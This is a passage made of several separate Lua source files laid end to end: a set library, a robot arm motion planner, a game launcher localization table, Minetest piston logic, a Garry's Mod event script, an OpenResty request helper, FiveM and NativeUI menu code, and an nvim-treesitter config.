assert(type(b)=='table', 'Invalid operand type on the right side')
return #a < #b
end
local function lessThanOrEqual(a, b)
assert(type(a)=='table', 'Invalid operand type on the left side')
assert(type(b)=='table', 'Invalid operand type on the right side')
return #a <= #b
end
obj.checkSum = function()
return checkSum
end
obj.whereAnd = function(t)
assert(type(t)=='table', 'Table argument expected')
return obj % function(v)
for pk, pv in pairs(t) do
if v[pk] ~= pv then
return false
end
end
return true
end
end
obj.whereOr = function(t)
assert(type(t)=='table', 'Table argument expected')
return obj % function(v)
for pk, pv in pairs(t) do
if v[pk] == pv then
return true
end
end
return false
end
end
setmetatable(obj, {
__index = getElement,
__newindex = setElement,
__len = getElementsCount,
__add = addElements,
__sub = subtractElements,
__mul = intersectElements,
__div = operateOnElements,
__mod = filterElements,
__pairs = pairsIterator,
__ipairs = ipairsIterator,
__eq = setComparator,
__lt = lessThan,
__le = lessThanOrEqual,
__call = clone,
})
if type(initialElements)=='table' then
init(initialElements)
end
return obj
end
return {
new = new,
hash = sha1.binary,
HMAC = sha1.hmac_binary,
}
|
local movearm = {}
local Body = require'Body'
local util = require'util'
local vector = require'vector'
local T = require'Transform'
local P = require'libArmPlan'
-- Use Steve's kinematics for arm kinematics
local K = require'K_ffi'
-- Use SJ's kinematics for the mass properties
--local K0 = Body.Kinematics
local dqLimit = DEG_TO_RAD / 3
local radiansPerSecond, torso0
do
-- Good
--local degreesPerSecond = vector.new{15,15,15, 15, 25,25,25}
--local degreesPerSecond = vector.new{15,10,20, 15, 20,20,20}
--local degreesPerSecond = vector.ones(7) * 30
local degreesPerSecond = vector.ones(7) * 15
--local degreesPerSecond = vector.ones(7) * 100
radiansPerSecond = degreesPerSecond * DEG_TO_RAD
-- Compensation items
torso0 = {-Config.walk.torsoX, 0, 0}
end
local lPlanner, rPlanner
do
local minLArm = vector.slice(
Config.servo.min_rad, Config.parts.LArm[1], Config.parts.LArm[#Config.parts.LArm])
local maxLArm = vector.slice(
Config.servo.max_rad, Config.parts.LArm[1], Config.parts.LArm[#Config.parts.LArm])
local minRArm = vector.slice(
Config.servo.min_rad, Config.parts.RArm[1], Config.parts.RArm[#Config.parts.RArm])
local maxRArm = vector.slice(
Config.servo.max_rad, Config.parts.RArm[1], Config.parts.RArm[#Config.parts.RArm])
-- Set up the planners for each arm
print('Setting up planners')
lPlanner = P.new_planner('Left')
:set_chain(K.forward_larm, K.inverse_larm, K.jacobian_larm)
:set_limits(minLArm, maxLArm, radiansPerSecond)
:set_update_rate(10)
:set_shoulder_granularity(2*DEG_TO_RAD)
rPlanner = P.new_planner('Right')
:set_chain(K.forward_rarm, K.inverse_rarm, K.jacobian_rarm)
:set_limits(minRArm, maxRArm, radiansPerSecond)
:set_update_rate(10)
:set_shoulder_granularity(2*DEG_TO_RAD)
end
movearm.lPlanner = lPlanner
movearm.rPlanner = rPlanner
-- Play the plan as a coroutine
-- Array of joint angles
-- Callback on sensed data
local function co_play(self, plan, callback)
if not plan.qwPath then return end
-- Run the optimizer
--plan.n_optimizations = 10
plan.n_optimizations = 10
plan.update_jacobians = true
plan.n_optimizations = 1
-- plan.n_optimizations = 0
--plan.update_jacobians = false
if not plan.nulls then self:jacobians(plan) end
-- Show the initial vw
mattorch.saveTable("~/plan0.mat", plan)
local t0 = unix.time()
for i=1,plan.n_optimizations-1 do
plan.i_optimizations = i
if not plan.nulls then self:jacobians(plan) end
plan.qwPath = self:optimize(plan)
--plan.qwPath = self:optimize2(plan)
if plan.update_jacobians then
self:jacobians(plan)
-- Save the updated vw
mattorch.saveTable("~/plan"..i..".mat", plan)
end
end
-- Just send the final data.
if plan.n_optimizations>0 then
plan.i_optimizations = plan.n_optimizations + 1
plan.qwPath = self:optimize(plan, true)
if plan.update_jacobians then
self:jacobians(plan)
end
end
local t1 = unix.time()
if not plan.nulls then self:jacobians(plan) end
print(string.format("%d iterations %.2f ms (%s)",
plan.n_optimizations, (t1 - t0)*1e3, tostring(plan.via)))
mattorch.saveTable("~/planEnd.mat", plan)
local qArmSensed, qWaistSensed = coroutine.yield()
if type(callback)=='function' then
callback(qArmSensed, qWaistSensed)
end
-- Check if we include the waist
local hasWaist = plan.qWaistGuess~=nil
local qArm, qWaist
-- Try the optimized one
for i, qWaistArm in ipairs(plan.qwPath) do
if hasWaist then
qArm = {unpack(qWaistArm, 2)}
qWaist = {qWaistArm[1], 0}
else
qArm = qWaistArm
end
qArmSensed, qWaistSensed = coroutine.yield(qArm, qWaist)
if type(callback)=='function' then
callback(qArmSensed, qWaistSensed)
end
end
-- TODO: This is a repeat...
return qArm, qWaist, plan.Js, plan.nulls
end
-- Take a desired joint configuration and move linearly in each joint towards it
function movearm.goto(l, r)
-- Assume no motion
local lco, rco = false, false
local qcLArm = Body.get_larm_command_position()
local qcRArm = Body.get_rarm_command_position()
local qcWaist = Body.get_safe_waist_command_position()
local lplan = type(l)=='table' and P[l.via]
--lplan = P.joint_preplan
if type(lplan)=='function' then
--lco = coroutine.create(lplan)
-- must copy the plan to keep the wait ok
l = util.shallow_copy(l)
if l.q then vector.new(l.q) end
if l.weights then vector.new(l.weights) end
if l.qWaistGuess then vector.new(l.qWaistGuess) end
if l.qArmGuess then vector.new(l.qArmGuess) end
-- Check the various formats
if l.tr then
if #l.tr==6 then
l.tr = T.transform6D(l.tr)
elseif #l.tr==7 then
l.tr = T.from_quatp(l.tr)
end
end
l.qArm0 = vector.new(l.qLArm0 or qcLArm)
l.qWaist0 = vector.new(l.qWaist0 or qcWaist)
l.dt = lPlanner.dt
end
local rplan = type(r)=='table' and P[r.via]
if type(rplan)=='function' then
-- must copy the plan to keep the wait ok
r = util.shallow_copy(r)
-- Check the various formats
if r.tr then
if #r.tr==6 then
r.tr = T.transform6D(r.tr)
elseif #r.tr==7 then
r.tr = T.from_quatp(r.tr)
end
end
if r.weights then vector.new(r.weights) end
if r.qWaistGuess then vector.new(r.qWaistGuess) end
if r.qArmGuess then vector.new(r.qArmGuess) end
r.qArm0 = vector.new(r.qRArm0 or qcRArm)
r.qWaist0 = vector.new(r.qWaist0 or qcWaist)
r.dt = rPlanner.dt
end
-- Add the compensation
--[[
local qLComp = qcLArm
if l and l.tr and l.qArmFGuess then
qLComp = l.qArmFGuess
end
local qRComp = qcRArm
if r and r.tr and r.qArmFGuess then
qRComp = r.qArmFGuess
end
local qWComp = qcWaist
if l and l.tr and l.qWaistGuess then
if r and r.tr and r.qWaistGuess then
print('movearm | two waist comp')
else
qWComp = l.qWaistGuess
end
elseif r and r.tr and r.qWaistGuess then
qWComp = r.qWaistGuess
end
if (l and l.tr) or (r and r.tr) then
local uTorsoComp = Body.get_torso_compensation(qLComp, qRComp, qWComp)
print('movearm | uTorsoComp', unpack(uTorsoComp))
local trComp = T.trans(uTorsoComp[1], uTorsoComp[2], 0)
if l and l.tr then
print('movearm | Compensating L...')
l.tr0 = l.tr
l.tr = trComp * l.tr0
end
if r and r.tr then
print('movearm | Compensating R...')
r.tr0 = r.tr
r.tr = trComp * r.tr0
end
end
--]]
if type(lplan)=='function' then
--[[
print('movearm | L Plan')
util.ptable(l)
print()
--]]
local ok, msg = pcall(lplan, lPlanner, l)
if ok then
lco = coroutine.create(co_play)
ok, msg = coroutine.resume(lco, lPlanner, l)
end
if not ok then lco = msg end
end
if type(rplan)=='function' then
--[[
print('movearm | R Plan')
util.ptable(r)
print()
--]]
local ok, msg = pcall(rplan, rPlanner, r)
if ok then
rco = coroutine.create(co_play)
ok, msg = coroutine.resume(rco, rPlanner, r)
end
if not ok then lco = msg end
end
return lco, rco
end
return movearm
|
local myvariable = 3
function someFunc(...)
if myvariable <= 4 then
print(...)
end
end
|
return {
-- Maintainer: BozoDel
-- Internal
id = "PT_BR",
name = "Português Brasileiro", -- I think there are enough differences between Brazilian and European Portuguese to justify this.
-- Tabs
list_all = "Todos",
list_all_tooltip = "Todos os jogos (%d)",
list_favorite = "Favoritos",
list_favorite_tooltip = "Seus jogos favoritos",
list_downloaded = "Baixados",
list_downloaded_tooltip = "Jogos já baixados",
list_new = "Novos",
list_new_tooltip = "Jogos adicionados recentemente (%d)",
-- Global Buttons
settings = "Configurações",
settings_tooltip = "Configurar o Vapor",
-- Info Section
size = "Tamanho",
welcome = "Bem-vindo ao Vapor.",
nodescription = "Nenhuma descrição disponível.",
-- Info Button Status
download = "Baixar",
download_tooltip = "Baixar esse jogo agora.",
downloading = "Baixando...",
downloading_tooltip = "Seu jogo está sendo baixado.",
hashing = "Verificando...",
hashing_tooltip = "Seu jogo está sendo verificado.",
invalid = "Erro",
invalid_tooltip = "Aconteceu um erro. Clique para deletar esse jogo.",
play = "Jogar",
play_tooltip = "Esse jogo está pronto para ser jogado.",
-- Game Buttons
favorite_tooltip = "Marcar esse jogo como favorito.",
delete_tooltip = "Deletar esse jogo.",
website_tooltip = "Visitar o site do autor."
}
|
--register stoppers for movestones/pistons
mesecon.mvps_stoppers={}
function mesecon:is_mvps_stopper(node, pushdir, stack, stackid)
local get_stopper = mesecon.mvps_stoppers[node.name]
if type (get_stopper) == "function" then
get_stopper = get_stopper(node, pushdir, stack, stackid)
end
return get_stopper
end
function mesecon:register_mvps_stopper(nodename, get_stopper)
if get_stopper == nil then
get_stopper = true
end
mesecon.mvps_stoppers[nodename] = get_stopper
end
function mesecon:mvps_process_stack(stack)
-- update mesecons for placed nodes ( has to be done after all nodes have been added )
for _, n in ipairs(stack) do
nodeupdate(n.pos)
mesecon.on_placenode(n.pos, minetest.get_node(n.pos))
mesecon:update_autoconnect(n.pos)
end
end
function mesecon:mvps_push(pos, dir, maximum) -- pos: pos of mvps; dir: direction of push; maximum: maximum nodes to be pushed
local np = {x = pos.x, y = pos.y, z = pos.z}
-- determine the number of nodes to be pushed
local nodes = {}
while true do
local nn = minetest.get_node_or_nil(np)
if not nn or #nodes > maximum then
-- don't push at all, something is in the way (unloaded map or too many nodes)
return
end
if nn.name == "air"
or minetest.registered_nodes[nn.name].liquidtype ~= "none" then --is liquid
break
end
table.insert (nodes, {node = nn, pos = np})
np = mesecon:addPosRule(np, dir)
end
-- determine if one of the nodes blocks the push
for id, n in ipairs(nodes) do
if mesecon:is_mvps_stopper(n.node, dir, nodes, id) then
return
end
end
-- remove all nodes
for _, n in ipairs(nodes) do
n.meta = minetest.get_meta(n.pos):to_table()
minetest.remove_node(n.pos)
end
-- update mesecons for removed nodes ( has to be done after all nodes have been removed )
for _, n in ipairs(nodes) do
mesecon.on_dignode(n.pos, n.node)
mesecon:update_autoconnect(n.pos)
end
-- add nodes
for _, n in ipairs(nodes) do
np = mesecon:addPosRule(n.pos, dir)
minetest.add_node(np, n.node)
minetest.get_meta(np):from_table(n.meta)
end
for i in ipairs(nodes) do
nodes[i].pos = mesecon:addPosRule(nodes[i].pos, dir)
end
return true, nodes
end
function mesecon:mvps_pull_single(pos, dir) -- pos: pos of mvps; direction: direction of pull (matches push direction for sticky pistons)
local np = mesecon:addPosRule(pos, dir)
local nn = minetest.get_node(np)
if minetest.registered_nodes[nn.name].liquidtype == "none"
and not mesecon:is_mvps_stopper(nn, {x = -dir.x, y = -dir.y, z = -dir.z}, {{pos = np, node = nn}}, 1) then
local meta = minetest.get_meta(np):to_table()
minetest.remove_node(np)
minetest.add_node(pos, nn)
minetest.get_meta(pos):from_table(meta)
nodeupdate(np)
nodeupdate(pos)
mesecon.on_dignode(np, nn)
mesecon:update_autoconnect(np)
end
return {{pos = np, node = {param2 = 0, name = "air"}}, {pos = pos, node = nn}}
end
function mesecon:mvps_pull_all(pos, direction) -- pos: pos of mvps; direction: direction of pull
local lpos = {x=pos.x-direction.x, y=pos.y-direction.y, z=pos.z-direction.z} -- 1 away
local lnode = minetest.get_node(lpos)
local lpos2 = {x=pos.x-direction.x*2, y=pos.y-direction.y*2, z=pos.z-direction.z*2} -- 2 away
local lnode2 = minetest.get_node(lpos2)
if lnode.name ~= "ignore" and lnode.name ~= "air" and minetest.registered_nodes[lnode.name].liquidtype == "none" then return end
if lnode2.name == "ignore" or lnode2.name == "air" or not(minetest.registered_nodes[lnode2.name].liquidtype == "none") then return end
local oldpos = {x=lpos2.x+direction.x, y=lpos2.y+direction.y, z=lpos2.z+direction.z}
repeat
lnode2 = minetest.get_node(lpos2)
minetest.add_node(oldpos, {name=lnode2.name})
nodeupdate(oldpos)
oldpos = {x=lpos2.x, y=lpos2.y, z=lpos2.z}
lpos2.x = lpos2.x-direction.x
lpos2.y = lpos2.y-direction.y
lpos2.z = lpos2.z-direction.z
lnode = minetest.get_node(lpos2)
until lnode.name=="air" or lnode.name=="ignore" or not(minetest.registered_nodes[lnode2.name].liquidtype == "none")
minetest.remove_node(oldpos)
end
mesecon:register_mvps_stopper("default:chest_locked")
mesecon:register_mvps_stopper("default:furnace")
|
local mgn = mgn
mgn.HideCVar = CreateClientConVar(mgn.HideCVarName, "0", true, true)
include("sh_locations.lua")
include("cl_vox.lua")
include("stages/sh_idle.lua")
include("stages/cl_exploding.lua")
include("stages/cl_overloading.lua")
include("stages/cl_intro.lua")
hook.Add("Think", "mgn.Activation", function()
-- CLIENTSIDE HACK TIME
if IsValid(mgn.ControlComputer) then
local overload_active = mgn.ControlComputer:IsOverloading()
local system_active = mgn.IsOverloading()
if not overload_active and system_active then
mgn.InterruptOverload()
elseif overload_active and not system_active then
mgn.InitiateOverload(mgn.ControlComputer:GetOverloadStart())
end
end
-- END CLIENTSIDE HACK TIME
end)
function mgn.InitiateOverload(start)
assert(IsValid(mgn.ControlComputer), "Attempting to initiate overload when the control computer was not found.")
if mgn.IsOverloading() then
return
end
local curtime = CurTime()
if start then
local offset = curtime - start
local stage = mgn.Stage.Intro
while stage.EndTime < offset and stage ~= mgn.Stage.Idle do
stage = stage.Next
end
if stage == mgn.Stage.Idle then
print("[MGN] Attempting to initiate overload with a starting time when it is too late to be in event.")
start = 0
end
mgn.OverloadStage = stage
mgn.OverloadStart = start
else
mgn.OverloadStage = mgn.Stage.Intro
mgn.OverloadStart = curtime
end
end
function mgn.InterruptOverload()
assert(IsValid(mgn.ControlComputer), "Attempting to shutdown overload when the control computer was not found.")
if not mgn.IsOverloading() then
return
end
if mgn.OverloadStage.End then
mgn.OverloadStage:End(CurTime())
end
mgn.OverloadStage.Started = false
mgn.OverloadStage.StartedAt = 0
mgn.OverloadStage = mgn.Stage.Idle
mgn.OverloadStart = 0
end
function mgn.RunHideCheck(stage)
if not mgn.HideCVar:GetBool() then
return false
end
if stage.Started then
mgn.StopStage(stage)
end
mgn.OverloadStage = mgn.Stage.Idle
return true
end
|
-- Copyright (C) James Marlowe (jamesmarlowe), Lumate LLC.
local cjson = require "cjson"
local ok, new_tab = pcall(require, "table.new")
if not ok then
new_tab = function (narr, nrec) return {} end
end
local _M = new_tab(0, 155)
_M._VERSION = '0.1'
function _M.capture(url, url_arguments, decode, log_table)
local ok, response = pcall(ngx.location.capture, url, url_arguments)
if not log_table then log_table = {} end
if not log_table['success_log_level'] then
log_table['success_log_level'] = ngx.NOTICE
end
if not log_table['failure_log_level'] then
log_table['failure_log_level'] = ngx.ERR
end
local message = url.."-total"
ngx.log(log_table['success_log_level'], message)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
if ok and response then
if not decode and response.body then
local message = url.."-success"
ngx.log(log_table['success_log_level'], message)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return response.body
elseif response.body then
local ok, result = pcall(cjson.decode, response.body)
if ok and result then
local message = url.."-success"
ngx.log(log_table['success_log_level'], message)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return result
else
local message = url.."-failed"
ngx.log(log_table['failure_log_level'], message..result)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return nil, message..result
end
else
if 199 < response.status and 400 > response.status then
local message = url.."-success"
ngx.log(log_table['success_log_level'], message)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return result
else
local message = url.."-failed"
ngx.log(log_table['failure_log_level'], message..":"..response.status)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return nil, message..":"..response.status
end
end
else
local message = url.."-failed"
ngx.log(log_table['failure_log_level'], message)
if log_table['counter_dict'] then
local val = log_table['counter_dict']:incr(message, 1)
if not val then log_table['counter_dict']:add(message, 1) end
end
return nil, message
end
end
return _M
|
-- Credit : Ideo
function drawNotification(text)
SetNotificationTextEntry("STRING")
AddTextComponentString(text)
DrawNotification(true, true)
end
Menu = {}
Menu.GUI = {}
Menu.TitleGUI = {}
Menu.buttonCount = 0
Menu.titleCount = 0
Menu.selection = 0
Menu.hidden = true
MenuTitle = "Menu"
-------------------
posXMenu = 0.1
posYMenu = 0.05
width = 0.1
height = 0.05
posXMenuTitle = 0.1
posYMenuTitle = 0.05
widthMenuTitle = 0.1
heightMenuTitle = 0.05
-------------------
function Menu.addTitle(name)
local yoffset = 0.3
local xoffset = 0
local xmin = posXMenuTitle
local ymin = posYMenuTitle
local xmax = widthMenuTitle
local ymax = heightMenuTitle
Menu.TitleGUI[Menu.titleCount +1] = {}
Menu.TitleGUI[Menu.titleCount +1]["name"] = name
Menu.TitleGUI[Menu.titleCount+1]["xmin"] = xmin + xoffset
Menu.TitleGUI[Menu.titleCount+1]["ymin"] = ymin * (Menu.titleCount + 0.01) +yoffset
Menu.TitleGUI[Menu.titleCount+1]["xmax"] = xmax
Menu.TitleGUI[Menu.titleCount+1]["ymax"] = ymax
Menu.titleCount = Menu.titleCount+1
end
function Menu.addButton(name, func, args)
local yoffset = 0.3
local xoffset = 0
local xmin = posXMenu
local ymin = posYMenu
local xmax = width
local ymax = height
Menu.GUI[Menu.buttonCount +1] = {}
Menu.GUI[Menu.buttonCount +1]["name"] = name
Menu.GUI[Menu.buttonCount+1]["func"] = func
Menu.GUI[Menu.buttonCount+1]["args"] = args
Menu.GUI[Menu.buttonCount+1]["active"] = false
Menu.GUI[Menu.buttonCount+1]["xmin"] = xmin + xoffset
Menu.GUI[Menu.buttonCount+1]["ymin"] = ymin * (Menu.buttonCount + 0.01) +yoffset
Menu.GUI[Menu.buttonCount+1]["xmax"] = xmax
Menu.GUI[Menu.buttonCount+1]["ymax"] = ymax
Menu.buttonCount = Menu.buttonCount+1
end
function Menu.updateSelection()
if IsControlJustPressed(1, 175) then -- INPUT_CELLPHONE_RIGHT
if(Menu.selection < Menu.buttonCount -1 )then
Menu.selection = Menu.selection +1
else
Menu.selection = 0
end
elseif IsControlJustPressed(1, 174) then -- INPUT_CELLPHONE_LEFT
if(Menu.selection > 0)then
Menu.selection = Menu.selection -1
else
Menu.selection = Menu.buttonCount-1
end
elseif IsControlJustPressed(1, 176) then -- INPUT_CELLPHONE_SELECT
MenuCallFunction(Menu.GUI[Menu.selection +1]["func"], Menu.GUI[Menu.selection +1]["args"])
end
local iterator = 0
for id, settings in ipairs(Menu.GUI) do
Menu.GUI[id]["active"] = false
if(iterator == Menu.selection ) then
Menu.GUI[iterator +1]["active"] = true
end
iterator = iterator +1
end
end
function Menu.renderGUI()
if not Menu.hidden then
Menu.renderTitle()
Menu.renderButtons()
Menu.updateSelection()
end
end
function Menu.renderBox(xMin,xMax,yMin,yMax,color1,color2,color3,color4)
DrawRect(xMin, yMin,xMax, yMax, color1, color2, color3, color4);
end
function Menu.renderTitle()
local yoffset = 0.3
local xoffset = 0
local xmin = posXMenuTitle
local ymin = posYMenuTitle
local xmax = widthMenuTitle
local ymax = heightMenuTitle
for id, settings in pairs(Menu.TitleGUI) do
local screen_w = 0
local screen_h = 0
screen_w, screen_h = GetScreenResolution(0, 0)
boxColor = {20,30,10,255}
SetTextFont(0)
SetTextScale(0.0,0.35)
SetTextColour(255, 255, 255, 255)
SetTextCentre(true)
SetTextDropShadow(0, 0, 0, 0, 0)
SetTextEdge(0, 0, 0, 0, 0)
SetTextEntry("STRING")
AddTextComponentString(string.upper(settings["name"]))
DrawText(settings["xmin"], (settings["ymin"] - heightMenuTitle - 0.0125))
Menu.renderBox(settings["xmin"] ,settings["xmax"], settings["ymin"] - heightMenuTitle, settings["ymax"],boxColor[1],boxColor[2],boxColor[3],boxColor[4])
end
end
function Menu.renderButtons()
for id, settings in pairs(Menu.GUI) do
local screen_w = 0
local screen_h = 0
screen_w, screen_h = GetScreenResolution(0, 0)
boxColor = {42,63,17,255}
if(settings["active"]) then
boxColor = {107,158,44,255}
end
SetTextFont(0)
SetTextScale(0.0,0.35)
SetTextColour(255, 255, 255, 255)
SetTextCentre(true)
SetTextDropShadow(0, 0, 0, 0, 0)
SetTextEdge(0, 0, 0, 0, 0)
SetTextEntry("STRING")
AddTextComponentString(settings["name"])
DrawText(settings["xmin"], (settings["ymin"] - 0.0125 ))
Menu.renderBox(settings["xmin"] ,settings["xmax"], settings["ymin"], settings["ymax"],boxColor[1],boxColor[2],boxColor[3],boxColor[4])
end
end
--------------------------------------------------------------------------------------------------------------------
function ClearMenu()
--Menu = {}
Menu.GUI = {}
Menu.buttonCount = 0
Menu.titleCount = 0
Menu.selection = 0
end
function MenuCallFunction(fnc, arg)
_G[fnc](arg)
end
|
require'nvim-treesitter.configs'.setup {
ensure_installed = {
'bash',
'css',
'go',
'html',
'javascript',
'jsdoc',
'json',
'lua',
'python',
'scss',
'toml',
'typescript',
'vue',
'yaml'
},
autopairs = {
enable = true
},
highlight = {
enable = true
},
indent = {
enable = true
},
incremental_selection = {
enable = true
},
query_linter = {
enable = true
}
}
|
---@type table
UIMenuColourPanel = setmetatable({}, UIMenuColourPanel)
---@type table
UIMenuColourPanel.__index = UIMenuColourPanel
---@type table
---@return string
UIMenuColourPanel.__call = function()
return "UIMenuPanel", "UIMenuColourPanel"
end
---New
---@param Title string
---@param Colours number
---@return table
---@public
function UIMenuColourPanel.New(Title, Colours)
local _UIMenuColourPanel = {
Data = {
Pagination = {
Min = 1,
Max = 8,
Total = 8,
},
Index = 1000,
Items = Colours,
Title = Title or "Title",
Enabled = true,
Value = 1,
},
Background = Sprite.New("commonmenu", "gradient_bgd", 0, 0, 431, 112),
Bar = {},
EnableArrow = true,
LeftArrow = Sprite.New("commonmenu", "arrowleft", 0, 0, 30, 30),
RightArrow = Sprite.New("commonmenu", "arrowright", 0, 0, 30, 30),
SelectedRectangle = UIResRectangle.New(0, 0, 44.5, 8),
Text = UIResText.New(Title .. " [1 / " .. #Colours .. "]" or "Title" .. " [1 / " .. #Colours .. "]", 0, 0, 0.35, 255, 255, 255, 255, 0, "Centre"),
ParentItem = nil
}
for Index = 1, #Colours do
if Index < 10 then
table.insert(_UIMenuColourPanel.Bar, UIResRectangle.New(0, 0, 44.5, 44.5, table.unpack(Colours[Index])))
else
break
end
end
if #_UIMenuColourPanel.Data.Items ~= 0 then
_UIMenuColourPanel.Data.Index = 1000 - (1000 % #_UIMenuColourPanel.Data.Items)
_UIMenuColourPanel.Data.Pagination.Max = _UIMenuColourPanel.Data.Pagination.Total + 1
_UIMenuColourPanel.Data.Pagination.Min = 0
end
return setmetatable(_UIMenuColourPanel, UIMenuColourPanel)
end
---SetParentItem
---@param Item table
---@return table
---@public
function UIMenuColourPanel:SetParentItem(Item)
-- required
if Item() == "UIMenuItem" then
self.ParentItem = Item
else
return self.ParentItem
end
end
---Enabled
---@param Enabled boolean
---@return boolean
---@public
function UIMenuColourPanel:Enabled(Enabled)
if type(Enabled) == "boolean" then
self.Data.Enabled = Enabled
else
return self.Data.Enabled
end
end
---Position
---@param Y number
---@return nil
---@public
function UIMenuColourPanel:Position(Y)
if tonumber(Y) then
local ParentOffsetX, ParentOffsetWidth = self.ParentItem:Offset().X, self.ParentItem:SetParentMenu().WidthOffset
self.Background:Position(ParentOffsetX, Y)
for Index = 1, #self.Bar do
self.Bar[Index]:Position(15 + (44.5 * (Index - 1)) + ParentOffsetX + (ParentOffsetWidth / 2), 55 + Y)
end
self.SelectedRectangle:Position(15 + (44.5 * ((self:CurrentSelection() - self.Data.Pagination.Min) - 1)) + ParentOffsetX + (ParentOffsetWidth / 2), 47 + Y)
if self.EnableArrow ~= false then
self.LeftArrow:Position(7.5 + ParentOffsetX + (ParentOffsetWidth / 2), 15 + Y)
self.RightArrow:Position(393.5 + ParentOffsetX + (ParentOffsetWidth / 2), 15 + Y)
end
self.Text:Position(215.5 + ParentOffsetX + (ParentOffsetWidth / 2), 15 + Y)
end
end
---CurrentSelection
---@param value number
---@param PreventUpdate table
---@return number
---@public
function UIMenuColourPanel:CurrentSelection(value, PreventUpdate)
if tonumber(value) then
if #self.Data.Items == 0 then
self.Data.Index = 0
end
self.Data.Index = 1000000 - (1000000 % #self.Data.Items) + tonumber(value)
if self:CurrentSelection() > self.Data.Pagination.Max then
self.Data.Pagination.Min = self:CurrentSelection() - (self.Data.Pagination.Total + 1)
self.Data.Pagination.Max = self:CurrentSelection()
elseif self:CurrentSelection() < self.Data.Pagination.Min then
self.Data.Pagination.Min = self:CurrentSelection() - 1
self.Data.Pagination.Max = self:CurrentSelection() + (self.Data.Pagination.Total + 1)
end
self:UpdateSelection(PreventUpdate)
else
if #self.Data.Items == 0 then
return 1
else
if self.Data.Index % #self.Data.Items == 0 then
return 1
else
return self.Data.Index % #self.Data.Items + 1
end
end
end
end
---UpdateParent
---@param Colour table
---@return nil
---@public
function UIMenuColourPanel:UpdateParent(Colour)
local _, ParentType = self.ParentItem()
if ParentType == "UIMenuListItem" then
local PanelItemIndex = self.ParentItem:FindPanelItem()
local PanelIndex = self.ParentItem:FindPanelIndex(self)
if PanelItemIndex then
self.ParentItem.Items[PanelItemIndex].Value[PanelIndex] = Colour
self.ParentItem:Index(PanelItemIndex)
self.ParentItem.Base.ParentMenu.OnListChange(self.ParentItem.Base.ParentMenu, self.ParentItem, self.ParentItem._Index)
self.ParentItem.OnListChanged(self.ParentItem.Base.ParentMenu, self.ParentItem, self.ParentItem._Index)
else
for Index = 1, #self.ParentItem.Items do
if type(self.ParentItem.Items[Index]) == "table" then
if not self.ParentItem.Items[Index].Panels then
self.ParentItem.Items[Index].Panels = {}
end
self.ParentItem.Items[Index].Panels[PanelIndex] = Colour
else
self.ParentItem.Items[Index] = { Name = tostring(self.ParentItem.Items[Index]), Value = self.ParentItem.Items[Index], Panels = { [PanelIndex] = Colour } }
end
end
self.ParentItem.Base.ParentMenu.OnListChange(self.ParentItem.Base.ParentMenu, self.ParentItem, self.ParentItem._Index)
self.ParentItem.OnListChanged(self.ParentItem.Base.ParentMenu, self.ParentItem, self.ParentItem._Index)
end
elseif ParentType == "UIMenuItem" then
self.ParentItem.ActivatedPanel(self.ParentItem.ParentMenu, self.ParentItem, self, Colour)
end
end
---UpdateSelection
---@param PreventUpdate table
---@return nil
---@public
function UIMenuColourPanel:UpdateSelection(PreventUpdate)
local CurrentSelection = self:CurrentSelection()
if not PreventUpdate then
self:UpdateParent(CurrentSelection)
end
self.SelectedRectangle:Position(15 + (44.5 * ((CurrentSelection - self.Data.Pagination.Min) - 1)) + self.ParentItem:Offset().X, self.SelectedRectangle.Y)
for Index = 1, 9 do
self.Bar[Index]:Colour(table.unpack(self.Data.Items[self.Data.Pagination.Min + Index]))
end
self.Text:Text(self.Data.Title .. " [" .. CurrentSelection .. " / " .. #self.Data.Items .. "]")
end
---Functions
---@return nil
---@public
function UIMenuColourPanel:Functions()
local DrawOffset = { X = 0, Y = 0}
if self.ParentItem:SetParentMenu().Settings.ScaleWithSafezone then
DrawOffset = self.ParentItem:SetParentMenu().DrawOffset
end
--@Key Process
if IsDisabledControlJustPressed(0, 24) or IsDisabledControlJustPressed(0, 174) then
self:GoLeft()
end
if IsDisabledControlJustPressed(0, 24) or IsDisabledControlJustPressed(0, 175) then
self:GoRight()
end
--@Mouse Process
if IsMouseInBounds(self.LeftArrow.X, self.LeftArrow.Y, self.LeftArrow.Width, self.LeftArrow.Height, DrawOffset) then
if IsDisabledControlJustPressed(0, 24) then
self:GoLeft()
end
end
if IsMouseInBounds(self.RightArrow.X, self.RightArrow.Y, self.RightArrow.Width, self.RightArrow.Height, DrawOffset) then
if IsDisabledControlJustPressed(0, 24) then
self:GoRight()
end
end
for Index = 1, #self.Bar do
if IsMouseInBounds(self.Bar[Index].X, self.Bar[Index].Y, self.Bar[Index].Width, self.Bar[Index].Height, DrawOffset) then
if IsDisabledControlJustPressed(0, 24) then
self:CurrentSelection(self.Data.Pagination.Min + Index - 1)
end
end
end
end
---GoLeft
---@return nil
---@private
function UIMenuColourPanel:GoLeft()
if #self.Data.Items > self.Data.Pagination.Total + 1 then
if self:CurrentSelection() <= self.Data.Pagination.Min + 1 then
if self:CurrentSelection() == 1 then
self.Data.Pagination.Min = #self.Data.Items - (self.Data.Pagination.Total + 1)
self.Data.Pagination.Max = #self.Data.Items
self.Data.Index = 1000 - (1000 % #self.Data.Items)
self.Data.Index = self.Data.Index + (#self.Data.Items - 1)
self:UpdateSelection()
else
self.Data.Pagination.Min = self.Data.Pagination.Min - 1
self.Data.Pagination.Max = self.Data.Pagination.Max - 1
self.Data.Index = self.Data.Index - 1
self:UpdateSelection()
end
else
self.Data.Index = self.Data.Index - 1
self:UpdateSelection()
end
else
self.Data.Index = self.Data.Index - 1
self:UpdateSelection()
end
end
---GoRight
---@return nil
---@private
function UIMenuColourPanel:GoRight()
if #self.Data.Items > self.Data.Pagination.Total + 1 then
if self:CurrentSelection() >= self.Data.Pagination.Max then
if self:CurrentSelection() == #self.Data.Items then
self.Data.Pagination.Min = 0
self.Data.Pagination.Max = self.Data.Pagination.Total + 1
